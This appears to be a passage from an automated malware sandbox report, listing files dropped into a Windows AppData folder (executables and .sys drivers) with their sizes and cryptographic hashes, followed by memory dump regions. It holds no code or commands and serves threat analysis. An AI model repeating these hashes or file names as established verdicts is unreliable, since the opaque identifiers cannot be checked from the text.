f446f3daed76fa4d1fdfde1e00e9348ced91853662ba953e9beb8f0ac6450126

SHA512
07b959fab63ccf77072b70ae89f1ccc047fa4ba00fedff8503688125d9a2ca284811d4fb5c9125ff0468dd077ad2aae719b3b22067156f5c8a806f16890b9145

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
20d3c74cdc182b6758400a03e51b4fab

SHA1
72717b1143e867de38fb7804868746008a3355d1

SHA256
331519da30a944e806beca3c5eba0e7b085cec8da4d85cb5e69c4bd2a4e4a1cd

SHA512
9be9f6e9d302bb3806d602cd02bd7c67e7b2264a573b4d2cb7d9affdd2e30af0d51b0fc8187fdb66b42f2b39e33a2187ac95d08b01b6119ba5b81164a2252a0d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
9cd532765b0729c4baec955cf1c83da5

SHA1
a6536a645d869add9ae98bd207842b0e52da9952

SHA256
a9d6999c8346c3393a24899080b599bae7153369ea2765d04e81eaf619e6c526

SHA512
c2dc70c82e2bb4ccf77d185b29be7d3b8748f323dccf90a8ed74e46d034baaee7ceeaf726e5e87f773218669c046cc8ff9f105547b618ed6a44ca6cc16f73207

Download Submit
C:\Users\Admin\AppData\Roaming\UCORESYS.sys

Filesize
15KB

MD5
9555d36fb21b993e5c4b98c2fc2b3671

SHA1
210a98be7da32cea98618c5a9640c23ce518c0ee

SHA256
fd6f56189cd723b32fc06392867fcd5128e63d8b5801e4f7a83523f820531981

SHA512
3ec96ba6fca7a4aa45becfef84b23b12c305f34045ac1a15b22745289e33b9326103e853bad698434df772a76515e7e8109fa8724d65f0351ee380c16d888c60

Download Submit
C:\Users\Admin\AppData\Roaming\UCOREW64.sys

Filesize
14KB

MD5
a17c58c0582ee560c72f60764ed63224

SHA1
bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825

SHA256
a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200

SHA512
a820a3280da690980a9297fe1e62356eba1983356c579d1c7ea8d6f64bc710b11b0a659c5d6b011690863065541f5627c4e3bc13c02087493de7e63d60981063

Download Submit
C:\Users\Admin\AppData\Roaming\ZRGHJR345.exe

Filesize
31.9MB

MD5
a48537d35ede9fe4d15b0818870c6ff2

SHA1
e760863c4db17e55e72ba507ebb22a5b9396c304

SHA256
628a2b6ad14cb09e3432f369c7ac3f2d341c5c518bfb9af16ee77e1d62601deb

SHA512
c6556320d20a051cbfe08febbdf80ff3168b4a7654ce1d77bada1329d499497462cef1d978abfa95d064dac49eb14dc7e914d0b9391aec6546991d499f3aaf97

Download Submit
C:\Users\Admin\AppData\Roaming\cleanerOLD1.exe

Filesize
103KB

MD5
59a7ce7a4d30e28e6bc356263693eb98

SHA1
a6ace03c0f719ce2e4f9839d0917778a5e798340

SHA256
baa7fb9cd0b15a926d8a34bc070c6cee839eb6bd2a7d4f133eed6b64a5607d8d

SHA512
8e6dac42e51945fc4bf8ab52a6642a548d7493796eda396ebd6dbe5e986f0ee46ae0e9f9d9fd714b020fda0c24f0265436278be62c1488097a777076a5e1c0c2

Download Submit
C:\Users\Admin\AppData\Roaming\ddc.exe

Filesize
377KB

MD5
97b963fd85ff4cc2a3b0da8164593cfc

SHA1
f29b0ba7cc01182f83845088375c2c18fd49f187

SHA256
af219747072341760396d686f2fe7350ec2dce713f1ec1977c21f8be7b9197d5

SHA512
232bcfb83387ed125f3c3a065031e36e3f7c494118aa2fa33c64fd3d81066531ad9de09c5358f5b0a24024b0a223a2fc4a5646e9b475853904b24729df808fae

Download Submit
C:\Users\Admin\AppData\Roaming\reset_adapters.exe

Filesize
335KB

MD5
bd624e99155ffa5868f39c73a1513cee

SHA1
0a6c46d21faefaf29c992193e5dac6b4b4a58719

SHA256
4f67490d6a7d952599180f26d167b74c70d4f840d36e73bb8ec7ffb29b6a6df8

SHA512
46471f61f44f97d63993349ed005b26d0a415b4082c1a48321aba18e58d3e10415f24d18ece3016cf65967a29ca85b8d935f70e06fd5ef96cb046d7074d9368c

Download Submit
C:\Users\Admin\AppData\Roaming\y9cisa.exe

Filesize
287KB

MD5
a40c0ac9a37e43f59b46ff904b4d5129

SHA1
f5a4ba6ee1c7b545d38adc4ebc643637bf5ce572

SHA256
b5f9963936710df46d027c56f408e908658f8767b1de139fe98fb2a04dcf1314

SHA512
1f554a90ad0fa1069d05a5fbec977256c5ef22b3f22a991361b92e6eabed2d117bc8ec80f2a0054734514706d31d21016624549e2ed4216388fe1611aee41f41

Download Submit
memory/5576-552-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/5628-556-0x0000000000340000-0x0000000000360000-memory.dmp

Filesize
128KB

Download
memory/6052-460-0x0000000006930000-0x0000000006B44000-memory.dmp

Filesize
2.1MB

Download
memory/6052-456-0x0000000005180000-0x000000000518A000-memory.dmp

Filesize
40KB

Download
memory/6052-455-0x00000000051B0000-0x0000000005242000-memory.dmp

Filesize
584KB

Download
memory/6052-454-0x0000000005760000-0x0000000005D06000-memory.dmp

Filesize
5.6MB

Download
memory/6052-453-0x0000000000750000-0x000000000079E000-memory.dmp

Filesize
312KB

Download